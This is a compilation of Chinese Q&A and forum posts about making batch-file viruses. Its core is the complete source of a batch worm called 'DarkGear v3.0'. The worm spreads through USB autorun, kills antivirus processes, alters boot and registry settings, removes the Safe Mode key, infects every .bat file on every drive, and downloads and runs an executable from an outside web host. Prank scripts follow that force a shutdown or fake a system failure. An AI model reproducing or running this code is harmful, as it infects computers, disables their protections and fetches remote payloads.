bat病毒制作(bat 病毒)
求一些bat病毒代码,最近在学习bat,想研究一下
愿我的答案 能够解决您的烦忧
最好不要学习,BAT代码的执行后就不能停止了,一般会立刻发作让电脑出现各种异常
1,所以代码可以看,但是千万别制作,制作了就要立刻查杀病毒。去卡饭论坛去找吧
2,下载腾讯电脑管家“8.4”最新版,对电脑首先进行一个体检,打开所有防火墙避免系统其余文件被感染。
3,打开杀毒页面开始查杀,切记要打开小红伞引擎。
4,如果普通查杀不能解决问题,您可以打开腾讯电脑管家---工具箱---顽固木马专杀- 进行深度
扫描。
5,查杀处理完所有病毒后,立刻重启电脑,再进行一次安全体检,清除多余系统缓存文件,避免二次感染。
如果您对我的答案不满意,可以继续追问或者提出宝贵意见,谢谢
给大家一个BAT编写的病毒,自己做完运行一下,看看什么效果
严重肯定下,你写的bat很规范,变量也用地很好。。
我也学BAT
给你看看我的把,很久前写的,不要见笑啊,U盘传播,外加一个免杀的下载者(因为这个下载者放到了带“..”的特殊文件夹里,你应该明白呵呵)
AUTOEXEC --开机过程中就运行病毒了
带感染BAT文件,而且自身感染好像没有考虑= =||
@echo off
for %%i in (D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z: )do (if %cd:~0,2%==%%i goto auto)
if %cd%==C:\RECYCL goto auto
:ww
attrib %0 -a -s -r -h
copy /y %0 "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat"
goto z
:z
IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs" goto e
tskill wscript
del "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
if not exist "C:\Program Files\Common Files\MSSoap\Binaries\msconfig.ini" goto new
goto zz
:zz
Tskill Mcshield
Tskill VsTskMgr
Tskill naPrdMgr
Tskill UpdaterUI
Tskill TBMon
Tskill scan32
Tskill Ravmond
Tskill CCenter
Tskill RavTask
Tskill Rav
Tskill Ravmon
Tskill RavmonD
Tskill RavStub
Tskill KVXP
Tskill KvMonXP
Tskill KVCenter
Tskill KVSrvXP
Tskill KRegEx
Tskill UIHost
Tskill TrojDie
Tskill FrogAgent
Tskill kav
Tskill kav32
Tskill kavstart
Tskill katmain
attrib -a -s -r -h c:\boot.ini
echo c:\="microsoft dos"c:\boot.ini
attrib +a +s +r +h c:\boot.ini
attrib -a -s -r -h c:\msdos.sys
attrib -a -s -r -h c:\config.sys
echo [option] c:\msdos.sys
echo bootkey=1 c:\msdos.sys
echo BootMenu=0 c:\msdos.sys
echo BootWarn=0 c:\msdos.sys
echo BootFailSafe=0 c:\msdos.sys
echo DisabeLog =1 c:\msdos.sys
for %%k in (a,c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @echo lastdrive=%%k c:\config.sys
attrib +a +s +r +h c:\msdos.sys
attrib +a +s +r +h c:\config.sys
attrib -a -s -r -h c:\autoexec.bat
echo @echo off c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KvMonXP /f c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kav /f c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KAVPersonal50 /f c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v McAfeeUpdaterUI /f c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Network Associates Error Reporting /f c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v YLive.exe /f c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v yassistse /f c:\autoexec.bat
echo REG DELETE HKLM\ServiceSOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ShStatEXE /f c:\autoexec.bat
echo REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /f c:\autoexec.bat
echo REG add HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 0 /f c:\autoexec.bat
echo REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /f c:\autoexec.bat
echo reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /t REG_DWORD /d 0 /f c:\autoexec.bat
echo REG DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /f c:\autoexec.bat
attrib +a +s +r +h c:\autoexec.bat
IF NOT EXIST c:\Progra~1\Intern~1\PLUGINS\shell~1\down.vbs goto f
goto x
:x
cscript c:\Progra~1\Intern~1\PLUGINS\shell~1\down.vbs http://www.llzaj.com/cmd.exe c:\Progra~1\Intern~1\PLUGINS\shell~1\DarkGear.exe
C:\Progra~1\COMMON~1\Micros~1\DarkGear.exe
copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs" "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\"
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /f
reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /t REG_DWORD /d 0 /f
goto a
:a
IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs" goto b
if not exist "c:\Program Files\Common Files\Microsoft Shared\desktop.ini" goto d
IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf" goto c
for %%i in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf" %%i
for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do md "%%c\RECYCL"
for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\desktop.ini" "%%c\RECYCL"
for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" "%%c\RECYCL"
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\AutoRun.bat" +a +s +r +h
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\desktop.ini" +a +s +r +h
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\autorun.inf" +a +s +r +h
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\" +a +s +r +h /s /d
ping 127.0.0.1 -n 10 nul
goto a
:b
ECHO Set shell = Wscript.createobject("wscript.shell") "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs"
ECHO a = shell.run ("C:\Progra~1\COMMON~1\Micros~1\AutoRun.bat",0)"c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs"
goto a
:c
ECHO [autorun]"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
ECHO OPEN=RECYCL\AutoRun.bat"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
ECHO shell\open\Command=RECYCL\AutoRun.bat"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
ECHO shell\explore\Command=RECYCL\AutoRun.bat"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
goto a
:d
echo [.ShellClassInfo]"c:\Program Files\Common Files\Microsoft Shared\desktop.ini"
echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}"c:\Program Files\Common Files\Microsoft Shared\desktop.ini"
goto a
:e
ECHO Set shell = Wscript.createobject("wscript.shell") "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
ECHO a = shell.run ("C:\Progra~1\COMMON~1\Micros~1\AutoRun.bat",0)"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
exit
:f
md c:\Progra~1\Intern~1\PLUGINS\shell..\
echo On Error Resume Next c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo Dim eee,eeee c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo eeee = LCase(WScript.Arguments(1)) c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo eee = LCase(WScript.Arguments(0)) c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo Set xPost = createObject("Microsoft.XMLHTTP") c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo xPost.Open "GET",eee,0 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo xPost.Send() c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo Set sGet = createObject("ADODB.Stream") c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Mode = 3 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Type = 1 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Open() c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Write(xPost.responseBody) c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.SaveToFile eeee,2 c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
goto x
:auto
%windir%\explorer.exe %cd:~0,2%
if not exist "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" goto ww
IF EXIST "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs" goto z
exit
:new
md c:\Progra~1\Intern~1\PLUGINS\shell..\
copy "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" c:\Progra~1\Intern~1\PLUGINS\shell..\
at 9:58 tskill cmd
at 10:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
at 13:58 tskill cmd
at 14:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
at 19:58 tskill cmd
at 20:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
at 15:58 tskill cmd
at 16:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
echo This is DarkGear v3.0 , Make by The Ghost Hunter "C:\Program Files\Common Files\MSSoap\Binaries\msconfig.ini"
FOR %%a in ( c: d: e: f: g: h: i: j: k: l: m: n: o: p: q: r: s: t: u: v: w: s: y: z: ) do dir /a:- /s /b %%a\*.bat%windir%\msconfig.inf
FOR /f "delims=" %%i in (%windir%\msconfig.inf) do attrib -a -s -r -h "%%i"
FOR /f "delims=" %%i in (%windir%\msconfig.inf) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" "%%i"
del "c:\windows\msconfig.inf"
exit
其实那些TSkill都没用,编这个的时候我很菜
怎么才能做一个会自行刷很多错误命令而不会破坏系统的bat病毒?
你可以打开360安全卫士----安全防护中心----信任和阻止-----信任的程序,在里边添加信任程序就可以了
自制简单电脑病毒破解
1.建立一个txt文件,写入"shutdown -a"(引号不算),改名为bat,运行后可以直接取消关机指令。
2.如果你速度够快,按WIN+R然后输入shutdown -a 也可以
怎麼制作简单的病毒,
想学习吗/
整个最最简单的,恶作剧程序,不是病毒。
新建一个记事本,在里面输入 shutdown -s -f -t 0
然后另存为 关机喽.bat
其中.bat是扩展名,不要告诉我你不知道啥时扩展名。
哈哈,然后你双击一下那个文件,系统关机了吧。
上面只是个简单的关机命令,复杂的也写些代码的,编程哦。
楼主以后要先学好编程知识才能够写病毒哦。
怎么才能制作一个玩笑病毒,高人请说说,真正的病毒也可以说说。大家踊跃回答。快快
这是一个bat代码,可以转成EXE文件:@echo off
echo 正在为您的系统加速.........
echo 正在优化系统....
ping 127.0.0.1 -n 10 nul
echo 正在删除垃圾文件....
ping 127.0.0.1 -n 5 nul
echo 系统异常,按空格键退出本系统
pause
echo 系统崩溃,命令无效
ping 127.0.0.1 -n 2 nul
echo 开始卸载所有程序.....
ping 127.0.0.1 -n 3 nul
echo 准备卸载C 盘文件
ping 127.0.0.1 -n 2 nul
echo 卸载D盘文件
ping 127.0.0.1 -n 2 nul
echo 卸载E盘文件....
ping 127.0.0.1 -n 2 nul
echo 卸载系统.....
ping 127.0.0.1 -n 5 nul
rundll32 powrprof.dll,SetSuspendState
ping 127.0.0.1 -n 2 nul
echo 哈哈,上当了吧.......
把这段代码复制粘贴到记事本,把后缀名改成bat,别人要是不懂电脑,绝对会疯掉,还可以转成EXE。
如何编写一个bat 文件杀毒
bat是dos下的批处理文件
批处理运用:查常见病毒
其实,对于上网的人来说,遇到病毒是在所难免的。然而,如果真的不幸感染,怎样才能发现呢?难道真的要买昂贵的杀毒软件吗?不一定。
我们可以编写批处理来查一些常见的网络病毒。如果确认感染病毒,可以下载专用杀毒工具进行查杀,或采取其他途径杀毒。
下面,我以欢乐时光为例进行分析:
主文件:1.bat
其它文件:2.bat 3.bat
1.bat代码:
@if exist c:\folder.htt call 2.bat
@if exist d:\folder.htt call 2.bat
@if exist e:\folder.htt call 2.bat
@if exist f:\folder.htt call 2.bat
2.bat代码:
@echo 发现欢乐时光病毒!
@call 3.bat
@pause
3.bat代码:
@c:
@dir *.htt *.ini /s/a1.txt
@d:
@dir *.htt *.ini /s/a1.txt
@e:
@dir *.htt *.ini /s/a1.txt
这样,如果中毒,那么必定会存在大量folder.htt和Desktop.ini,通过这样可以粗略的检查计算机是否感染病毒。
批处理运用三:文件处理
假设,我要大规模的做文件的移动、删除等,如果在Windows里操作不免会出现错误,而且这些错误不易察觉。因此,用批处理进行操作,不但简单易行,而且容易发现错误并可以及时纠正。
例如,我要将D盘的htm文件移动到E盘,再格式化D盘,然后将文件移回D盘,并改后缀为html。
1.bat代码:
@E:
@Md d
@D:
@Copy *.htm e:\d
@if exist e:\d\*.htm call 2.bat
2.bat代码:
@Format d:/q
@Copy e:\d\*.htm d:
@D:
@Ren *.htm *.html